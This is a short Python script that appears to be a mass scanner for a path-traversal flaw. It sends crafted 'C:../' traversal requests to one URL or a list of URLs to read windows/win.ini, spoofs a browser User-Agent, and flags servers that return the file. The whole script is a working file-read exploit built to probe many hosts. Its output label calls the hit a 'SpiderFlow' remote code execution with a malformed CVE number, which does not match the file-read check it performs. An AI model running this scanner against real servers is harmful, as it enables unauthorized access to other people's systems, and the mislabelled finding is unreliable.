import requests,re
import urllib3
import string,random
from urllib.parse import urljoin,quote
import argparse
import urllib.request
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls



def check(url):
    url = url.rstrip("/")
    win_target = url+"/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
    }
    try:
        win_response = urllib.request.Request(win_target, headers=headers, method="GET", unverifiable=True)
        win_res = urllib.request.urlopen(win_response)
        win_status_code = win_res.getcode()
        win_content = win_res.read().decode()
        if win_status_code == 200 and 'mci extension' in win_content and 'extensions' in win_content:
            print(f"\033[31mDiscovered:{url}: windows-SpiderFlow_CVE-2024-019_RCE!\033[0m")
            return True
    except Exception as e:
        pass


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt

    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")